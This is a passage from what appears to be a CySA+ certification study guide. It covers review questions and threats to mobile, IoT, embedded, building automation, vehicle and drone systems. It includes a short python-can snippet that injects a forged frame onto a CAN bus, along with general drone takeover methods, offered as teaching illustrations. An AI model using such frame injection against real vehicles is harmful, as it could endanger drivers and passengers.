the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 4-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 4-2 Key Topics in Chapter 4
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
web vulnerability scanners
synthetic transaction monitoring
real user monitoring (RUM)
Burp Suite
OWASP Zed Attack Proxy (ZAP)
Nikto
Arachni
Nessus Professional
OpenVAS
Qualys
software development life cycle (SDLC)
static code analysis
dynamic analysis
reverse engineering
fuzzing
enumeration
Nmap
Null scan
FIN scan
XMAS scan
host scanning
SYN flood
active enumeration
passive enumeration
Responder
Aircrack-ng
Reaver
oclHashcat
ScoutSuite
Prowler
Pacu
REVIEW QUESTIONS
1. The
___________________________________
_____________ produces an interception proxy
called ZAP.
2. Match the tool on the left with its definition on the
right.
3. List at least one of the advantages of the cloud-based approach to vulnerability scanning.
4. Arrange the following steps of the SDLC in the
proper order.
Gather requirements
Certify/accredit
Release/maintain
Design
Test/validate
Perform change management and configuration
management/replacement
Develop
Plan/initiate project
5. ________________________ analysis is done
without the code executing.
6. List at least one form of static code review.
7. Match the type of code review on the left with its
definition on the right.
8. List at least one measure that can help prevent fault
injection attacks.
9. Match the following tools with their definitions.
10. List at least one of the cloud platforms supported by
ScoutSuite.
Chapter 5. Threats and
Vulnerabilities Associated
with Specialized
Technology
This chapter covers the following topics related
to Objective 1.5 (Explain the threats and
vulnerabilities associated with specialized
technology) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
• Mobile: Discusses threats specific to the mobile
environment
• Internet of Things (IoT): Covers threats
specific to the IoT
• Embedded: Describes threats specific to
embedded systems
• Real-time operating system (RTOS): Covers
threats specific to an RTOS
• System-on-Chip (SoC): Investigates threats
specific to an SoC
• Field programmable gate array (FPGA):
Covers threats specific to FPGAs
• Physical access control: Discusses threats
specific to physical access control systems
• Building automation systems: Covers threats
specific to building automation systems
• Vehicles and drones: Describes threats specific
to vehicles and drones
• Workflow and process automation
systems: Covers threats specific to workflow and
process automation systems
• Incident Command System (ICS): Discusses
the use of ICS
• Supervisory control and data acquisition
(SCADA): Covers systems that operate with
coded signals over communication channels to
provide control of remote equipment
In some cases, the technologies that we create and
develop to enhance our ability to control the
environment and to automate processes create security
issues. As we add functionality, we almost always
increase the attack surface. This chapter describes
specific issues that are unique to certain scenarios and
technologies.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these 12 self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 5-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 5-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a specification first used in
late 2001 that allows USB devices, such as tablets
and smartphones, to act as either a USB host or a
USB device?
a. USB pass-through
b. USB-OTG
c. Ready Boost
d. LoJack
2. Which of the following is not one of the five
categories of IoT deployments?
a. LAN base
b. Smart home
c. Wearables
d. Connected cars
3. Which of the following describes a piece of software
that is built into a larger piece of software and is in
charge of performing some specific function on
behalf of the larger system?
a. Proprietary
b. Legacy
c. Embedded
d. Linked
4. VxWorks 6.5 is an example of a(n)
_______________ system?
a. Modbus
b. embedded
c. RTOS
d. legacy
5. Which of the following is an example of a SoC that
manages all the radio functions in a network
interface?
a. Dual-core processor
b. Broadband processor
c. Baseband processor
d. Hyper-processor
6. An FPGA is an example of which of the following?
a. SoC
b. PLD
c. PGA
d. Hypervisor
7. Which of the following is a series of two doors with
a small room between them?
a. Turnstile
b. Bollard
c. Mantrap
d. Moat
8. Which of the following is an application, network,
and media access control (MAC) layer
communications service used in HVAC systems?
a. BACnet
b. Modbus
c. CAN bus
d. BAP
9. Which of the following is designed to allow vehicle
microcontrollers and devices to communicate with
each other’s applications without a host computer?
a. CAN bus
b. ZigBee
c. Modbus
d. BAP
10. Which of the following is a tool used to automate
network functions?
a. DMVPN
b. Puppet
c. Net DNA
d. Modbus
11. Which of the following provides guidance for how to
organize assets to respond to an incident (system
description) and processes to manage the response
through its successive stages (concept of
operations)?
a. ICS
b. DMVPN
c. IEE
d. IoT
12. Which of the following industrial control system
components connect to the sensors and convert
sensor data to digital data, including telemetry
hardware?
a. PLCs
b. RTUs
c. BUS link
d. Modbus
FOUNDATION TOPICS
MOBILE
In today’s world, seemingly everyone in the workplace
has at least one mobile device. But with the popularity of
mobile devices has come increasing security issues for
security professionals. The increasing use of mobile
devices combined with the fact that many of these
devices connect using public networks with little or no
security provides security professionals with unique
challenges.
Educating users on the risks related to mobile devices
and ensuring that they implement appropriate security
measures can help protect against threats involved with
these devices. Some of the guidelines that should be
provided to mobile device users include implementing a
device-locking PIN, using device encryption,
implementing GPS location, and implementing remote
wipe. Also, users should be cautioned on downloading
apps without ensuring that they are coming from a
reputable source. In recent years, mobile device
management (MDM) and mobile application
management (MAM) systems have become popular in
enterprises. They are implemented to ensure that an
organization can control mobile device settings,
applications, and other parameters when those devices
are attached to the enterprise network.
The threats presented by the introduction of personal
mobile devices (smartphones and tablets) to an
organization’s network include the following:
• Insecure web browsing
• Insecure Wi-Fi connectivity
• Lost or stolen devices holding company data
• Corrupt application downloads and installations
• Missing security patches
• Constant upgrading of personal devices
• Use of location services
While the most common types of corporate information
stored on personal devices are corporate emails and
company contact information, it is alarming to note that
some surveys show almost half of these devices also
contain customer data, network login credentials, and
corporate data accessed through business applications.
To address these issues and to meet the rising demand
by employees to bring personal devices into the
workplace and use them for both work and personal
purposes, many organizations are creating bring your
own device (BYOD) policies. As a security
professional, when supporting a BYOD initiative, you
should take into consideration that you probably have
more to fear from the carelessness of the users than you
do from hackers. Not only are users less than diligent in
maintaining security updates and patches on their
devices, but they also buy new devices frequently to get
the latest features.
These factors make it difficult to maintain control over
the security of the networks in which these devices are
allowed to operate.
Centralized mobile device management tools are
becoming the fastest-growing solution for both
organization-issued and personal mobile devices. Some
solutions leverage the messaging server’s management
capabilities, and others are third-party tools that can
manage multiple brands of devices. One example is
Cisco's Systems Manager, which integrates with the
Cisco Meraki cloud services. Another example is the Apple
Configurator for iOS devices. One of the challenges with
implementing such a system is that not all personal
devices may support native encryption and/or the
management process.
Typically, centralized MDM tools handle organization-issued and personal mobile devices differently. For
organization-issued devices, a client application typically
manages the configuration and security of the entire
device. If the device is a personal device allowed through
a BYOD initiative, the application typically manages the
configuration and security of itself and its data only. The
application and its data are sandboxed from the other
applications and data. The result is that the
organization’s data is protected if the device is stolen,
while the privacy of the user’s data is also preserved.
In Chapter 9, “Software Assurance Best Practices,” you
will learn about best practices surrounding the use of
mobile devices. The sections that follow look at some
additional security challenges posed by mobile devices.
Unsigned Apps/System Apps
Unsigned applications represent code that cannot be
verified to be what it purports to be or to be free of
malware. While many unsigned applications present
absolutely no security issues, most enterprises wisely
choose to forbid their installation. MDM software and
security settings in the devices themselves can be used to
prevent this.
System apps are those that come preinstalled on the
device. While these apps probably present no security
issue, some of them run all the time, so it might be
beneficial to remove them to save space and to improve
performance. The organization also might decide that
removing some system apps is necessary to prevent
features in these apps that can disclose information
about the user or the device that could lead to a social
engineering attack. By following the instructions on the
vendor site, these apps can be removed.
Security Implications/Privacy
Concerns
Security issues are inherent in mobile devices. Many of
these vulnerabilities revolve around storage devices.
Let’s look at a few.
Data Storage
While protecting data on a mobile device is always a
good idea, in many cases an organization must comply
with an external standard regarding the minimum
protection provided to the data on the storage device.
For example, the Payment Card Industry Data
Security Standard (PCI DSS) enumerates
requirements that payment card industry players must
meet to secure and monitor their networks, protect
cardholder data, manage vulnerabilities, implement
strong access controls, and maintain security policies.
Various storage types share certain issues and present
issues unique to the type.
Nonremovable Storage
The storage that is built into the device might not suffer
all the vulnerabilities shared by other forms, but the data
on it is still at risk. One tool at our disposal with this form of
storage that is not available with others is the ability to
remotely wipe the data if the device is stolen. At any rate,
the data should be encrypted with AES 128/256-bit
encryption. Also, be sure to have a backup copy of the
data stored in a secure location.
Removable Storage
While removable storage may be desirable in that it may
not be stolen if the device is stolen, it still can be lost and
stolen itself. Removable storage of any type represents
one of the primary ways data exfiltration occurs. If
removable storage is in use, the data should be encrypted
with AES 128/256-bit encryption.
Transfer/Back Up Data to Uncontrolled Storage
In some cases users store sensitive data in cloud storage
that is outside the control of the organization, using sites
such as Dropbox. These storage providers have had their
share of data loss issues as well. Policies should address
and forbid this type of storage of data from mobile
devices.
USB OTG
USB On-The-Go (USB OTG) is a specification first
used in late 2001 that allows USB devices, such as tablets
and smartphones, to act as either a USB host or a USB
device. With respect to smartphones, USB OTG has been
used to hack around an iPhone security feature that
requires a valid iPhone username and password to use a
device after a factory reset. This feature is supplied to
prevent the use of a stolen smartphone that has been
reset to factory defaults, but it can be defeated with a
hack using USB OTG.
Device Loss/Theft
Of course, one of the biggest threats to organizations is a
lost or stolen device containing irreplaceable or sensitive
data. Organizations should ensure that they can remotely
wipe the device when this occurs. Moreover, policies
should require that corporate data be backed up to a
server so that a remote wipe does not delete data that
only resides on the device.
Rooting/Jailbreaking
While rooting or jailbreaking a device enables the
user to remove some of the restrictions of the device, it
also presents security issues. Jailbreaking removes the
security restrictions on your iPhone or iPad. This means
apps are given access to the core functions of the device,
which normally requires user consent. It also allows
the installation of apps not found in the Apple Store. One
of the reasons those apps are not in the Apple Store is
that they are either insecure or malware masquerading
as a legitimate app. Finally, a rooted or jailbroken device
receives no security updates, making it even more
vulnerable.
Push Notification Services
Push notification services allow unsolicited
messages to be sent by an application to a mobile device
even when the application is not open on the device.
Although these services can be handy, there are some
security best practices when developing these services for
your organization:
• Do not send company confidential data or
intellectual property in the message payload.
• Do not store your SSL certificate and list of device
tokens in your web-root.
• Be careful not to inadvertently expose APN
(Apple) certificates or device tokens.
Geotagging
Geotagging is the process of adding geographical
identification metadata to various media and is enabled
by default on many smartphones (to the surprise of some
users). In many cases, this location information can be
used to locate where images, video, websites, and SMS
messages originate. At the very least, this information
can be used to assemble a social engineering attack. This
information has been used in the past to reveal the
location of high-valued goods. In an extreme case, four
U.S. Army Apache helicopters were destroyed (on the
ground) by the enemy after they were able to pinpoint
the helicopters’ location through geotagged photos taken
by U.S. soldiers and posted on the Internet.
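As a defensive illustration, the open-source exiftool
utility can reveal and strip this metadata; the file name is
an assumption:

# Display any GPS metadata embedded in a photo
exiftool -gps:all photo.jpg

# Remove all GPS tags before the image is shared
exiftool -gps:all= photo.jpg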
OEM/Carrier Android Fragmentation
Android fragmentation refers to the overwhelming
number of versions of Android that have been sold. The
primary issue is that many users are still running an
older version for which security patches are no longer
available. The fault typically lies with the phone
manufacturer, either for continuing to use an older
operating system when a new one is available or for
customizing the OS (remember, Android is open source)
so much that the security patches are incompatible.
Organizations should
consider these issues when choosing a phone
manufacturer.
Mobile Payment
One of the latest features of smartphones is the ability to
pay for items using the smartphone instead of a credit
card. There are various technologies used to make this
possible and they have attendant security issues. Let’s
look at how these technologies work.
NFC Enabled
A new security issue facing both merchants and
customers is the security of payment cards that use near
field communication (NFC), such as Apple Pay and
Google Pay. NFC is a short-range type of wireless
transmission and is therefore difficult to capture.
Moreover, these transmissions are typically encrypted.
However, interception is still possible. In any case, some
steps can be taken to secure these payment mechanisms:
• Lock the mobile device. Devices must be turned on
or unlocked before they can read any NFC tags.
• Turn off NFC when not in use.
• For passive tags, use an RFID/NFC-blocking
device.
• Scan mobile devices for unwanted apps, spyware,
and other threats that may siphon information
from your payment apps.
Inductance Enabled
Inductance is the process used in NFC to transmit the
information from the smartphone to the reader. Coils
made of ferrite material use electromagnetic induction
to transmit the information. Therefore, an
inductance-enabled device is one that supports a mobile
payment system. While capturing these transmissions is
possible, the attacker must be very close.
Mobile Wallet
An alternative technology used in mobile payment
systems is the mobile wallet, used by online companies
such as PayPal, Amazon Payments, and Google Pay. In this
system, the user registers his or her card number and is
issued a PIN, which is used to authorize payments. The PIN
identifies both the user and the card and authorizes
charges to the card.
Peripheral-Enabled Payments (Credit Card
Reader)
Credit card readers that attach to a mobile phone are
also becoming ubiquitous, especially among merchants
that operate in mobile or temporary locations such as
cabs, food trucks, and flea markets. Figure 5-1 shows one
such device reading a card.
Figure 5-1 Peripheral-Enabled Payments (Credit
Card Reader)
USB
Because this connection uses bounded media, it may be
the safest way to make a connection. The only way a
malicious individual could make this kind of connection
would be to gain physical access to the mobile device, so
physical security is the primary mitigation.
Malware
Just like laptops and desktops, mobile devices are targets
of viruses and malware. Major antivirus vendors such as
McAfee and Kaspersky make antivirus and anti-malware
products for mobile devices that provide the same real-time
protection that their desktop counterparts provide.
The same guideline that applies to computers applies to
mobile devices: keep the antivirus/anti-malware product
up to date by setting the device to check for updates
whenever connected to the Internet.
Unauthorized Domain Bridging
Most smartphones can act as a wireless hotspot. When a
device that is a member of the domain acts as a hotspot,
it can give anyone using the hotspot access to the
organizational network. This is called unauthorized
domain bridging and should be forbidden. Software is
available to prevent this; typically, it allows activation of
only a single communications adapter at a time,
deactivating all other communications adapters installed
on each computer authorized to access the network.
SMS/MMS/Messaging
Short Message Service (SMS) is a text messaging service
component of most telephone, World Wide Web, and
mobile telephony systems. Multimedia Messaging
Service (MMS) handles messages that include graphics
or videos. Both technologies present security challenges.
Because messages are sent in clear text, both are
susceptible to interception, spoofing, and spamming.
INTERNET OF THINGS (IOT)
The Internet of Things (IoT) refers to a system of
interrelated computing devices, mechanical and digital
machines, and objects that are provided with unique
identifiers and the ability to transfer data over a network
without requiring human-to-human or human-to-computer interaction. The IoT has presented attackers
with a new medium through which to carry out an attack.
Often the developers of IoT devices add connectivity and
IoT functionality without thoroughly considering the
security implications or building in any security controls
to protect the devices.
Note
IoT is a term for all physical objects, or “things,” that are now embedded with
electronics, software, and network connectivity. Thanks to the IoT, these
objects—including automobiles, kitchen appliances, and heating and air
conditioning controllers—can collect and exchange data. Unfortunately,
engineers give most of these objects this ability just for convenience and
without any real consideration of the security impacts. When these objects are
then deployed, consumers do not think of security either. The result is
consumer convenience but also risk. As the IoT evolves, security professionals
must be increasingly involved in the IoT evolution to help ensure that security
controls are designed to protect these objects and the data they collect and
transmit.
IoT Examples
IoT deployments include a wide variety of devices, but
are broadly categorized into five groups:
• Smart home: Includes products that are used in
the home. They range from personal assistance
devices, such as Amazon Alexa, to HVAC
components, such as Nest thermostats. These
devices are designed for home management and
automation.
• Wearables: Includes products that are worn by
users. They range from watches, such as the Apple
Watch, to personal fitness devices, like the Fitbit.
• Smart cities: Includes devices that help resolve
traffic congestion issues and reduce noise, crime,
and pollution. They include smart energy, smart
transportation, smart data, smart infrastructure,
and smart mobility devices.
• Connected cars: Includes vehicles that offer
Internet access and data sharing capabilities.
Technologies include GPS devices, OnStar, and
AT&T connected cars.
• Business automation: Includes devices that
automate HVAC, lighting, access control, and fire
detection for organizations.
Methods of Securing IoT Devices
Security professionals must understand the different
methods of securing IoT devices. The following are some
recommendations:
• Secure and centralize the access logs of IoT
devices.
• Use encrypted protocols to secure communication
(see the sketch after this list).
• Create secure password policies.
• Implement restrictive network communications
policies, and set up virtual LANs.
• Regularly update device firmware based on vendor
recommendations.
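As one illustration of the encrypted-protocols
recommendation, the following minimal Python sketch,
assuming the paho-mqtt library (1.x API) and a
hypothetical broker at iot.example.com, publishes a
sensor reading over MQTT protected by TLS rather than
in clear text.

import ssl
import paho.mqtt.client as mqtt

client = mqtt.Client(client_id="sensor-01")
client.username_pw_set("sensor-01", "a-strong-unique-password")  # per-device credentials
client.tls_set(ca_certs="ca.crt", tls_version=ssl.PROTOCOL_TLS_CLIENT)
client.connect("iot.example.com", 8883)  # 8883 is MQTT over TLS
client.publish("plant/floor1/temperature", "21.7")
client.disconnect()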
When selecting IoT devices, particularly those that are
implemented at the organizational level, security
professionals need to look into the following:
• Does the vendor design explicitly for privacy and
security?
• Does the vendor have a bug bounty program and
vulnerability reporting system?
• Does the device have manual overrides or special
functions for disconnected operations?
EMBEDDED SYSTEMS
An embedded system is a combination of hardware
and software that is built into a larger system and is in
charge of performing a specific function on behalf of that
system. The embedded part of the solution might
address specific hardware communications and might
require drivers to talk between the larger system and
some specific hardware. Embedded systems control
many devices in common use today and include systems
embedded in cars, HVAC systems, security alarms, and
even lighting systems. Machine-to-machine (M2M)
communication, the IoT, and remotely controlled
industrial systems have increased the number of
connected devices and simultaneously made these
devices targets.
Because embedded systems are usually placed within
another device without input from a security
professional, security is often not built into the device at all. So
although allowing the device to communicate over the
Internet with a diagnostic system provides a great service
to the consumer, oftentimes the manufacturer has not
considered that a hacker can reverse that communication
path and take over the device with the
embedded system. As of this writing, reports have
surfaced of individuals being able to take control of
vehicles using their embedded systems. Manufacturers
have released patches that address such issues, but not
all vehicle owners have applied or even know about the
patches. As M2M and IoT increase in popularity, security
professionals can expect to see a rise in incidents like
this. A security professional is expected to understand
the vulnerabilities these systems present and how to put
controls in place to reduce an organization’s risk.
REAL-TIME OPERATING
SYSTEM (RTOS)
Real-time operating systems (RTOSs) are
designed to process data as it comes in, typically without
buffer delays. Like all systems, they have a certain
amount of latency in the processing. One of the key
issues with these systems is to control the jitter (the
variability of such latency).
Many IoT devices use an RTOS. These operating systems
were not really designed with security in mind, and some
issues have surfaced. For example, VxWorks 6.5 and later
versions have been found to be susceptible to
vulnerabilities that allow remote attackers full control
over targeted devices. The security firm Armis discovered
and announced 11 such vulnerabilities, including six
critical ones, collectively branded URGENT/11, in the
summer of 2019. This is disturbing, because VxWorks is
used in mission-critical systems for the enterprise,
including SCADA, elevator, and industrial controllers, as
well as in healthcare equipment, including patient
monitors and MRI scanners.
SYSTEM-ON-CHIP (SOC)
Systems-on-Chip (SoCs) have become typical inside cell
phone electronics because of their reduced energy use. A
baseband processor is a chip in a network interface that
manages all the radio functions. A baseband processor
typically uses its own RAM and firmware. Since the
software that runs on baseband processors is usually
proprietary, it is impossible to perform an independent
code audit. In March 2014, makers of the free Android
derivative Replicant announced they had found a
backdoor in the baseband software of Samsung Galaxy
phones that allows remote access to the user data stored
on the phone. Although it has been some time since this
happened, it is a reminder that SoCs can be a security
issue.
FIELD PROGRAMMABLE
GATE ARRAY (FPGA)
A programmable logic device (PLD) is an integrated
circuit with connections or internal logic gates that can
be changed through a programming process. A field
programmable gate array (FPGA) is a type of PLD
that is programmed by blowing fuse connections on the
chip or using an antifuse that makes a connection when a
high voltage is applied to the junction.
FPGAs are used extensively in IoT implementations and
in cloud scenarios. In 2019, scientists discovered a
vulnerability in FPGAs. In a side-channel attack, cyber
criminals use the energy consumption of the chip to
retrieve information that allows them to break its
encryption. It is also possible to tamper with the
calculations or even to crash the chip altogether, possibly
resulting in data losses.
PHYSICAL ACCESS
CONTROL
Access control is all about using physical or logical
controls to determine who or what has access to a network,
system, or device. It also involves what type of access is
given to the information, network, system, device, or
facility. Access control is primarily provided using
physical and logical controls.
Physical access control focuses on controlling access to a
network, system, or device. In most cases, this involves
preventing users from being able to touch network
components (including
wiring), systems, or devices. While locks are the most
popular physical access control method for preventing
access to devices in a data center, other physical controls,
such as guards and biometrics, should also be
considered, depending on the needs of the organization
and the value of the asset being protected.
When installing an access control system, security
professionals should understand who needs access to the
asset being protected and how those users need to access
the asset. When multiple users need access to an asset,
the organization should set up a multilayer access
control system. For example, users wanting access to the
building may only need to sign in with a security guard.
However, to access the locked data center within the
same building, users would need a smart card. Both of
these would be physical access controls. To protect data
on a single server within the building (but not in the data
center), the organization would need to deploy such
mechanisms as authentication, encryption, and access
control lists (ACLs) as logical access controls but could
also place the server in a locked server room to provide
physical access control. When deploying physical and
logical access controls, security professionals must
understand the access control administration methods
and the different assets that must be protected and their
possible access controls.
Systems
To fully protect the systems used by the organization,
including client and server computers, security
professionals may rely on both physical and logical
access controls. However, some systems, like client
computers, may be deployed in such a manner that only
minimal physical controls are used. If a user is granted
access to a building, he or she may find client computers
being used in nonsecure cubicles throughout the
building. For these systems, a security professional must
ensure that the appropriate authentication mechanisms
are deployed. If confidential information is stored on the
client computers, encryption should also be deployed.
Ultimately, the organization itself is best positioned to
determine which controls to deploy on individual client
computers. When
it comes to servers, determining which access controls to
deploy is usually a more complicated process. Security
professionals should work with the server owner,
whether it is a department head or an IT professional, to
determine the value of the asset and the needed
protection. Of course, most servers should be placed in a
locked room. In many cases, this will be a data center or
server room. However, servers can be deployed in
regular locked offices if necessary. In addition, other
controls should be deployed to ensure that the system is
fully protected. The access control needs of a file server
are different from those of a web server or database
server. It is vital that the organization perform a
thorough assessment of the data that is being processed
and stored on the system before determining which
access controls to deploy. If limited resources are
available, security professionals must ensure that their
most important systems have more access controls than
other systems.
Devices
As with systems, physical access to devices is best
provided by placing the devices in a secure room. Logical
access to devices is provided by implementing the
appropriate ACL or rule list, authentication, and
encryption, as well as securing any remote interfaces that
are used to manage the device. In addition, security
professionals should ensure that the default accounts
and passwords are changed or disabled on the device.
For any IT professional who needs to access the device, a
user account should be configured with the appropriate
level of access. If a remote interface is used, make sure to
enable encryption, such as SSL/TLS, to ensure that
communication via the remote interface cannot be
intercepted and read. Security
professionals should closely monitor vendor
announcements for any devices to ensure that the
devices are kept up to date with the latest security
patches and firmware updates.
Facilities
With facilities, the primary concern is physical access,
which can be provided using locks, fencing, bollards,
guards, and closed-circuit television (CCTV). Many
organizations think that such measures are enough. But
with today’s advanced industrial control systems and the
IoT, organizations must also consider any devices
involved in facility security. If an organization has an
alarm/security system that allows remote viewing access
from the Internet, the appropriate logical controls must
be in place to prevent a malicious user from accessing
the system and changing its settings or from using the
system to gain inside information about the facility
layout and day-to-day operations. If the organization
uses an industrial control system (ICS), logical controls
should also be a priority. Security professionals must
work with organizations to ensure that physical and
logical controls are implemented appropriately to ensure
that the entire facility is protected.
Note
The abbreviation ICS is used for two different terms in this chapter:
industrial control system (ICS) and Incident Command System (ICS).
Physical access control systems are any systems used to
allow or deny physical access to the facility. Examples
include the following:
• Mantrap: This is a series of two doors with a
small room between them. The user is
authenticated at the first door and then allowed
into the room. At that point, additional
verification occurs (such as a guard visually
identifying the person), and then the person is
allowed through the second door. Mantraps are
typically used only in very high-security
situations. They can help prevent tailgating.
Figure 5-2 illustrates a mantrap design.
Figure 5-2 Mantrap
• Proximity readers: These readers are door
controls that read a proximity card from a short
distance and are used to control access to
sensitive rooms. These devices can also provide a
log of all entries and exits.
• IP-based access control and video systems:
When using these systems, a network traffic
baseline for each system should be developed so
that unusual traffic can be detected.
Some higher-level facilities are starting to incorporate
biometrics as well, especially in high-security
environments where terrorist attacks are a concern.
BUILDING AUTOMATION
SYSTEMS
The networking of facility systems has enhanced the
ability to automate the management of systems,
including the following:
• Lighting
• HVAC
• Water systems
• Security alarms
Bringing together the management of these seemingly
disparate systems allows for the orchestration of their
interaction in ways that were never before possible.
When industry leaders discuss the IoT, the success of
building automation is often used as a real example of
where connecting other devices, such as cars and street
signs, to the network can lead. These systems usually can
pay for themselves in the long run by managing the
entire ecosystem more efficiently in real time than a
human could ever do. If a wireless version of such a
system is deployed, keep the following issues in mind:
• Interference issues: Construction materials
may prevent you from using wireless everywhere.
• Security: Use encryption, separate the building
automation systems (BAS) network from the IT
network, and prevent routing between the
networks.
• Power: When Power over Ethernet (PoE) cannot
provide power to controllers and sensors, ensure
that battery life supports a reasonable lifetime and
that procedures are created to maintain batteries.
IP Video
IP video systems provide a good example of the benefits
of networking applications. These systems can be used
for both surveillance of a facility and facilitating
collaboration. An example of the layout of an IP
surveillance system is shown in Figure 5-3.
Figure 5-3 IP Surveillance
IP video has also ushered in a new age of remote
collaboration. It has saved a great deal of money on
travel expenses while at the same time making more
efficient use of time.
Issues to consider and plan for when implementing IP
video systems include the following:
• Expect a large increase in the need for bandwidth.
• QoS needs to be configured to ensure
performance.
• Storage needs to be provisioned for the camera
recordings. This could entail cloud storage, if
desired.
• The initial cost may be high.
HVAC Controllers
One of the best examples of the marriage of IP networks
and a system that formerly operated in a silo is the
heating, ventilation, and air conditioning (HVAC)
system. HVAC systems usually use a protocol called
Building Automation and Control Networks
(BACnet), which is an application, network, and media
access control (MAC) layer communications service. It
can operate over a number of Layer 2 protocols,
including Ethernet.
To use the BACnet protocol in an IP world, BACnet/IP
(B/IP) was developed. The BACnet standard makes
exclusive use of MAC addresses for all data links,
including Ethernet. To support IP, IP addresses are
needed. BACnet/IP, Annex J, defines an equivalent MAC
address composed of a 4-byte IP address followed by a 2-byte UDP port number. A range of 16 UDP port numbers
has been registered as hexadecimal BAC0 through BACF.
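The following minimal sketch (standard-library Python)
shows how that equivalent MAC address is formed from an
example IPv4 address and the default BACnet/IP port.

import socket
import struct

ip, port = "10.1.2.3", 0xBAC0   # 0xBAC0 = 47808, the default BACnet/IP port
bmac = socket.inet_aton(ip) + struct.pack("!H", port)  # 4-byte IP + 2-byte port
print(bmac.hex())               # prints 0a010203bac0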
While putting HVAC systems on an IP network makes
them more manageable, it has become apparent that
these networks should be separate from the internal
network. In the infamous Target breach, hackers broke
into the network of a third-party vendor that managed
Target's HVAC systems. The intruders leveraged the
trust and network access granted to the HVAC company
by Target and then, from these internal systems, broke
into the point-of-sale systems and stole credit and debit
card numbers, as well as other personal customer
information.
Sensors
Sensors are designed to gather information of some sort
and make it available to a larger system, such as an
HVAC controller. Sensors and their role in SCADA
systems are covered later in this chapter.
VEHICLES AND DRONES
Wireless capabilities added to vehicles and drones have
ushered in a new world of features, while at the same
time opening the door for all sorts of vulnerabilities
common to any network-connected device.
Connected vehicles are not those that drive themselves,
although those are coming. A connected vehicle is one
that can be reached with a wireless connection of some
sort. McAfee has identified the attack surface that exists
in a connected vehicle. Figure 5-4 shows the areas of
vulnerability.
Figure 5-4 Vehicle Attack Surface
As you can see in Figure 5-4, critical vehicle systems may
be vulnerable to wireless attacks.
CAN Bus
While autonomous vehicles may still be a few years off,
when they arrive they will rely heavily on in-vehicle
networking, alongside new standards for vehicle-to-vehicle
and vehicle-to-road communication. Controller Area
Network (CAN bus) is designed to allow vehicle
microcontrollers and devices to communicate with one
another without a host computer. Sounds great, huh?
It turns out CAN is a low-level protocol and does not
support any security features intrinsically. There is also
no encryption in standard CAN implementations, which
leaves these networks open to data interception.
Failure by vendors to implement their own security
measures may result in attacks if attackers manage to
insert messages on the bus. While passwords exist for
some safety-critical functions, such as modifying
firmware, programming keys, or controlling antilock
brake actuators, these systems are not implemented
universally and have a limited number of seed/key pairs
(meaning a brute-force attack is more likely to succeed).
Hopefully, an industry security standard for the CAN bus
will be developed at some point.
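The following minimal Python sketch, assuming the
python-can library and a Linux virtual CAN interface
(vcan0), shows the core of the problem: a CAN frame
carries an arbitration ID and data bytes but no sender
authentication, so any node on the bus can inject any
message. The arbitration ID below is hypothetical.

import can

bus = can.interface.Bus(channel="vcan0", bustype="socketcan")
frame = can.Message(arbitration_id=0x244,          # hypothetical engine-data ID
                    data=[0x00, 0x00, 0x1F, 0x40], # forged payload bytes
                    is_extended_id=False)
bus.send(frame)  # nothing on the bus verifies who sent this frame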
Drones
Drones are managed wirelessly and, as such, offer
attackers the same door of entry as found in connected
cars. In January 2020, the U.S. Department of the
Interior grounded nonemergency drones due to security
concerns. Why? The U.S. Department of Defense (DoD)
issued a warning that Chinese-made drones may be
compromised and capable of being used for espionage.
This followed a memo from the Navy & Marine Corps
Small Tactical Unmanned Aircraft Systems Program
Manager warning that “images, video and flight records could be
uploaded to unsecured servers in other countries via live
streaming.” Finally, the U.S. Department of Homeland
Security previously warned private-sector organizations
that their data may be pilfered if they use commercial
drone systems made in China.
Beyond the fear of Chinese-made drones that contain
backdoors, there is also the risk of a drone being
“hacked” and taken over by the attacker in midflight.
Since 2016, it has been known that it is possible in some
cases to do the following:
• Overwhelm the drone with thousands of
connection requests, causing the drone to land
• Send large amounts of data to the drone,
exceeding its capacity and causing it to crash
• Convince the drone that orders sent to land the
drone were coming from the drone itself rather
than attackers, causing the drone to follow orders
and land
At the time of writing in 2020, attackers have had four
years to probe for additional attack points. It is obvious
that drone security has to be made more robust.
WORKFLOW AND PROCESS
AUTOMATION SYSTEMS
Automating workflows and processes saves time and
human resources. One of the best examples is the
automation revolution occurring in network
management. Automation tools such as Puppet, Chef,
and Ansible, along with scripting, are automating
once-manual tasks such as log analysis, patch application,
and intrusion prevention.
These tools and scripts perform the job they do best,
which is manual drudgery, thus freeing up humans to do
what they do best, which is deep analysis and planning.
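As a small example of such drudgery being automated, the
following standard-library Python sketch counts failed
SSH logins per source address in a syslog-style auth log;
the log path is a common Linux default.

import re
from collections import Counter

PATTERN = re.compile(r"Failed password for .* from (\d+\.\d+\.\d+\.\d+)")

failures = Counter()
with open("/var/log/auth.log") as log:
    for line in log:
        match = PATTERN.search(line)
        if match:
            failures[match.group(1)] += 1

for ip, count in failures.most_common(10):
    print(f"{ip}: {count} failed logins")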
Alas, with automation come vulnerabilities. An example
is the cross-site scripting (XSS) vulnerability found in
IBM workflow systems, as detailed in CVE-2019-4149,
which can allow users to embed arbitrary JavaScript
code in the Web UI, thus altering the intended
functionality and potentially leading to credentials
disclosure within a trusted session. These automation
systems also need to be made more secure.
INCIDENT COMMAND
SYSTEM (ICS)
The Incident Command System (ICS) was designed
by FEMA to enable effective and efficient domestic
incident management by integrating a
combination of facilities, equipment, personnel,
procedures, and communications operating within a
common organizational structure.
ICS provides guidance for how to organize assets to
respond to an incident (system description) and
processes to manage the response through its successive
stages (concept of operations). All response assets are
organized into five functional areas: Command,
Operations, Logistics, Planning, and
Administration/Finance. Figure 5-5 highlights the five
functional areas of ICS and their primary
responsibilities.
Figure 5-5 Functional Areas of ICS
SUPERVISORY CONTROL
AND DATA ACQUISITION
(SCADA)
